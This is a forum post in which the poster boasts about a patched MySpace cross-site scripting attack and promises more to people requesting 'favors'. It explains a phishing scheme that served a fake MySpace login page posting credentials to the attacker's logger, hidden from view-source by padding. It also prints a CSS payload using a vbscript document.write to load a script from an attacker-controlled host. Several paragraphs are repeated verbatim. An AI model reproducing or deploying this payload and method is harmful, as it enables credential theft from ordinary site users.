VTECin5th
Administrator
Someone leaked or snitched on me, so Tom fixed my method of XSS on mySpace, there's a few more but i will wait a little bit before i do them, i'm sure he's lookin now.
He did write me a nice little message though:
"I LOL at your penix"
I laughed
(this is mostly to those people who were requesting mySpace favors--please wait a few weeks)
Inside mySpace.js was url escaped html inside a JS function to unescape it...this kept the XSS on the same server.
The HTML was just the myspace login page with form actions to my site/logger, when they looked at the url it was still on myspace.com.
If they viewed source the spaces you see before the vbscript write and the %3C pushed that out of view so everything looked perfectly normal.
There's only 4 more holes i know of to continue to be able to do this
I lol @ tom's penix.
He did write me a nice little message though:
"I LOL at your penix"
I laughed
(this is mostly to those people who were requesting mySpace favors--please wait a few weeks)
Code:
OMG I THOUGHT I KNEW YOU BUT I WAS WRONG OK!!!
<Style type="text/css">Body{background: url(vb script:document.write("%3CScript%20src%3Dhttp%3A%2F%2F_yoursite_._ORG_%2FmySpace.js%3E%3C%2Fscript%3E"));background-color: 000000;scrollbar-face-color: 252525;scrollbar-arrow-color: FFFFFF;scrollbar-highlight-color: 252525;scrollbar-3dlight-color: 252525;scrollbar-shadow-color: 252525;
scrollbar-darkshadow-color: 252525;scrollbar-track-color: 252525;}</style>The HTML was just the myspace login page with form actions to my site/logger, when they looked at the url it was still on myspace.com.
If they viewed source the spaces you see before the vbscript write and the %3C pushed that out of view so everything looked perfectly normal.
There's only 4 more holes i know of to continue to be able to do this
I lol @ tom's penix.
